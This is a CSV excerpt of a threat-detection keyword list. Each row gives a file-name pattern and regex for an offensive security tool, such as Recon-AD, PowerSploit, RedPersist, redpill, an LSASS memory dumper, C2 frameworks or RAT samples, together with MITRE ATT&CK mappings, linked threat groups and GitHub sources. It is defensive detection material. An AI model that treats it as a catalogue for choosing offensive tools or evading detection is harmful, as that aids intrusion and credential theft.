"*\Reaper-main\*.sys*",".{0,1000}\\Reaper\-main\\.{0,1000}\.sys.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","N/A","10","2","158","34","2024-12-07T01:52:58Z","2023-09-21T02:09:48Z","17826"
"*\REC2-main.zip*",".{0,1000}\\REC2\-main\.zip.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","17827"
"*\recaptcha-phish-main*",".{0,1000}\\recaptcha\-phish\-main.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","0","N/A","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","17828"
"*\Recon.tests.ps1*",".{0,1000}\\Recon\.tests\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","17829"
"*\Recon-AD-AllLocalGroups.dll",".{0,1000}\\Recon\-AD\-AllLocalGroups\.dll","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17830"
"*\Recon-AD-AllLocalGroups.dll*",".{0,1000}\\Recon\-AD\-AllLocalGroups\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","17831"
"*\Recon-AD-AllLocalGroups.sln*",".{0,1000}\\Recon\-AD\-AllLocalGroups\.sln.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17832"
"*\Recon-AD-AllLocalGroups\*",".{0,1000}\\Recon\-AD\-AllLocalGroups\\.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17833"
"*\Recon-AD-Computers.dll",".{0,1000}\\Recon\-AD\-Computers\.dll","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17834"
"*\Recon-AD-Computers.dll*",".{0,1000}\\Recon\-AD\-Computers\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","17835"
"*\Recon-AD-Computers.sln*",".{0,1000}\\Recon\-AD\-Computers\.sln.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17836"
"*\Recon-AD-Computers\*",".{0,1000}\\Recon\-AD\-Computers\\.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17837"
"*\Recon-AD-Domain.dll",".{0,1000}\\Recon\-AD\-Domain\.dll","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17838"
"*\Recon-AD-Domain.dll*",".{0,1000}\\Recon\-AD\-Domain\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","17839"
"*\Recon-AD-Domain.sln*",".{0,1000}\\Recon\-AD\-Domain\.sln.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17840"
"*\Recon-AD-Domain\*",".{0,1000}\\Recon\-AD\-Domain\\.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17841"
"*\Recon-AD-Groups.dll",".{0,1000}\\Recon\-AD\-Groups\.dll","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17842"
"*\Recon-AD-Groups.dll*",".{0,1000}\\Recon\-AD\-Groups\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","17843"
"*\Recon-AD-Groups.sln*",".{0,1000}\\Recon\-AD\-Groups\.sln.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17844"
"*\Recon-AD-LocalGroups.dll*",".{0,1000}\\Recon\-AD\-LocalGroups\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","17845"
"*\Recon-AD-LocalGroups.dll*",".{0,1000}\\Recon\-AD\-LocalGroups\.dll.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17846"
"*\Recon-AD-LocalGroups.sln*",".{0,1000}\\Recon\-AD\-LocalGroups\.sln.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17847"
"*\Recon-AD-LocalGroups\*",".{0,1000}\\Recon\-AD\-LocalGroups\\.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17848"
"*\Recon-AD-master*",".{0,1000}\\Recon\-AD\-master.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17849"
"*\Recon-AD-SPNs.dll*",".{0,1000}\\Recon\-AD\-SPNs\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","17850"
"*\Recon-AD-SPNs.sln*",".{0,1000}\\Recon\-AD\-SPNs\.sln.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17851"
"*\Recon-AD-SPNs\*",".{0,1000}\\Recon\-AD\-SPNs\\.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17852"
"*\Recon-AD-Users.dll*",".{0,1000}\\Recon\-AD\-Users\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","17853"
"*\Recon-AD-Users.dll*",".{0,1000}\\Recon\-AD\-Users\.dll.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17854"
"*\Recon-AD-Users.sln*",".{0,1000}\\Recon\-AD\-Users\.sln.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17855"
"*\RECOVER-FILES.txt*",".{0,1000}\\RECOVER\-FILES\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17856"
"*\RECOVERY_DARKBIT.txt*",".{0,1000}\\RECOVERY_DARKBIT\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17857"
"*\RECOVERY_INSTRUCTIONS.txt*",".{0,1000}\\RECOVERY_INSTRUCTIONS\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17858"
"*\RecycledGate.c*",".{0,1000}\\RecycledGate\.c.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","0","N/A","N/A","N/A","3","266","43","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z","17859"
"*\RedBackdoorer.py*",".{0,1000}\\RedBackdoorer\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","17860"
"*\RedDevil v1.0.exe*",".{0,1000}\\RedDevil\sv1\.0\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17861"
"*\RedGuard -*","RedGuard\s\-.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","0","N/A","N/A","10","10","1466","204","2024-08-20T17:43:35Z","2022-05-08T04:02:33Z","17862"
"*\redirecttosmb.py*",".{0,1000}\\redirecttosmb\.py.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","0","N/A","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","17863"
"*\RedPersist.exe*",".{0,1000}\\RedPersist\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","17864"
"*\RedPersist.pdb*",".{0,1000}\\RedPersist\.pdb.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","17865"
"*\RedPersist.sln*",".{0,1000}\\RedPersist\.sln.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","17866"
"*\RedPersist-main\*",".{0,1000}\\RedPersist\-main\\.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","17867"
"*\redpill.ps1*",".{0,1000}\\redpill\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17868"
"*\redpill.zip*",".{0,1000}\\redpill\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17869"
"*\redpill.zip*",".{0,1000}\\redpill\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17870"
"*\redpill\bin\*.ps1*",".{0,1000}\\redpill\\bin\\.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17871"
"*\ReflectDump.exe*",".{0,1000}\\ReflectDump\.exe.{0,1000}","offensive_tool_keyword","LsassReflectDumping","leverages the Process Forking technique using the RtlCreateProcessReflection API to clone the lsass.exe process. Once the clone is created - it utilizes MINIDUMP_CALLBACK_INFORMATION callbacks to generate a memory dump of the cloned process","T1003.001 - T1555.003 - T1077","TA0006","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/LsassReflectDumping","1","0","N/A","N/A","10","2","198","27","2024-10-19T08:16:13Z","2024-10-17T14:57:30Z","17873"
"*\ReflectDump.vcxproj*",".{0,1000}\\ReflectDump\.vcxproj.{0,1000}","offensive_tool_keyword","LsassReflectDumping","leverages the Process Forking technique using the RtlCreateProcessReflection API to clone the lsass.exe process. Once the clone is created - it utilizes MINIDUMP_CALLBACK_INFORMATION callbacks to generate a memory dump of the cloned process","T1003.001 - T1555.003 - T1077","TA0006","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/LsassReflectDumping","1","0","N/A","N/A","10","2","198","27","2024-10-19T08:16:13Z","2024-10-17T14:57:30Z","17874"
"*\reflective_dll.x64.dll*",".{0,1000}\\reflective_dll\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002  -  T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","17875"
"*\ReflectiveDll.cpp*",".{0,1000}\\ReflectiveDll\.cpp.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17876"
"*\ReflectiveDll.x64.dll*",".{0,1000}\\ReflectiveDll\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","17877"
